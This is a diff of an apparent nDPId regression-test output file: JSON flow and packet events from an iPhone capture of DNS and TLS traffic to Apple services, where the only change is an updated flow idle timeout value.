@@ -158,10 +158,10 @@ 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1582454598713,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454598713,"pkt":"xiwDYGpkxGGLNYKpCABFAABD04UAAP8RYsHAqAIRwKgCAcLYADUAL8OecEkBAAABAAAAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598713,"flow_last_seen":1582454598713,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454598713,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} 
-00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598721,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598721,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1582454598721,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598721,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrK\/AqAIREfi5V8WVAbuoGt7oAAAAALDC\/\/9fVwAAAgQFtAEDAwcBAQgKEd\/opwAAAAAEAgAA"} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454598723,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGtcfAqAIREfiwS8WUAbuGKOrEAHfVYYAQBAuCrAAAAQEIChHf6IhbEwd4"} +00913{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454598587,"flow_last_seen":1582454598723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454598723,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1582454598755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1582454598755,"pkt":"xGGLNYKpxiwDYGpkCABFAAC9YWUAAEARk2jAqAIBwKgCEQA1zcoAqUkOwemBgAABAAQAAAAAA3d3dwZpY2xvdWQDY29tAAABAAHADAAFAAEAAAfiAB8Hd3d3LWNkbgZpY2xvdWQDY29tBmFrYWRucwNuZXQAwCwABQABAAAAjwAZA3d3dwZpY2xvdWQDY29tB2VkZ2VrZXnARsBXAAUAAQAAEZYAFQVlNDQ3OAFhCmFrYW1haWVkZ2XARsB8AAEAAQAAABgABBctSi4="} 00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":172,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1582454598755,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"},"dns": {"query":"www.icloud.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.45.74.46"}} 
00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1582454598756,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1582454598756,"pkt":"xGGLNYKpxiwDYGpkCABFAADSfP0AAEARd7vAqAIBwKgCEQA10EUAvrFqiY6BgAABAAQAAAAACWlwaG9uZS1sZAVhcHBsZQNjb20AAAEAAcAMAAUAAQAACaQAJwlpcGhvbmUtbGQMb3JpZ2luLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAxAAUAAQAAAMcAIQxpcGhvbmUtbGQtYXIFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAFQVlOTMzOAFkCmFrYW1haWVkZ2XAU8CRAAEAAQAAAA8ABFx6\/FI="} 
@@ -172,36 +172,36 @@ 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":177,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1582454598758,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1582454598758,"pkt":"xGGLNYKpxiwDYGpkCABFAADPdQkAAEARf7LAqAIBwKgCEQA10t8AuwWPZlqBgAABAAQAAAAAA2JhZwZpdHVuZXMFYXBwbGUDY29tAAABAAHADAAFAAEAABGWACYIaW5pdC1jZG4MaXR1bmVzLWFwcGxlA2NvbQZha2FkbnMDbmV0AMAyAAUAAQAAC+cAGwZpdHVuZXMFYXBwbGUDY29tB2VkZ2VrZXnAU8BkAAUAAQAAEZYAGARlNjczBWRzY2U5CmFrYW1haWVkZ2XAU8CLAAEAAQAAABcABF9lGDU="} 
00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":178,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1582454598758,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"bag.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} -00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00971{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":179,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454598587,"flow_last_seen":1582454598759,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1582454598759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454598759,"pkt":"xGGLNYKpxiwDYGpkCABFAADQatgAAEARieLAqAIBwKgCEQA1wtgAvFoLcEmBgAABAAQAAAAABGluaXQGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAJGQAmCGluaXQtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAABEeABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAbAARfZRg1"} 
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":181,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454598759,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"init.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADjlzEAAEARXXbAqAIBwKgCEQA10BgAz2vgCAuBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMPAAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOnACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXwAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAPAARce00awJMAAQABAAAADwAEXHtNQA=="} 
00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1582454598760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1582454598760,"pkt":"xGGLNYKpxiwDYGpkCABFAADGO68AAEARuRXAqAIBwKgCEQA19D4AssJtjeyBgAABAAQAAAAAA2NsNAVhcHBsZQNjb20AAAEAAcAMAAUAAQAAD1IAJQdjbDQtY2RuDG9yaWdpbi1hcHBsZQNjb20GYWthZG5zA25ldADAKwAFAAEAAABkABgDY2w1BWFwcGxlA2NvbQdlZGdla2V5wEvAXAAFAAEAABGWABoGZTE0ODY4BWRzY2U5CmFrYW1haWVkZ2XAS8CAAAEAAQAAAA8ABGhJPR4="} 
00776{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":183,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1582454598760,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"cl4.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"104.73.61.30"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} 
-01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} 
-00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598766,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598766,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1582454598766,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598766,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGHzLAqAIRXHr8UsWWAbuHn+lSAAAAALDC\/\/\/nwQAAAgQFtAEDAwcBAQgKEd\/ozwAAAAAEAgAA"} 
+01344{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454598587,"flow_last_seen":1582454598768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4837,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1582454598768,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.icloud.com","server_names":"gateway-india.icloud.com,gateway-carry.icloud.com,gateway.icloud.com,gateway-australia.icloud.com,gateway-sandbox.icloud.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"1e60202b4001a190621caa963fb76697","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=Apple IST CA 2 - G1, OU=Certification Authority, O=Apple Inc., C=US","subjectDN":"CN=gateway.icloud.com, O=Apple Inc., ST=California, C=US","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"D2:DA:1C:68:0C:91:A7:DB:BA:B2:2D:29:06:DB:57:42:10:3D:3A:FE"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1582454598801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598801,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGajZcevxSwKgCEQG7xZaFiMYch5\/pU6BScSAUDwAAAgQFrAQCCAr\/dyjxEd\/ozwEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":192,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1582454598867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454598867,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADEG+7MR+LlXwKgCEQG7xZWfE+IlqBre6aBScSBsSgAAAgQFrAEBCArpLCwFEd\/opwEDAwU="} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598885,"flow_last_seen":1582454598885,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1582454598885,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 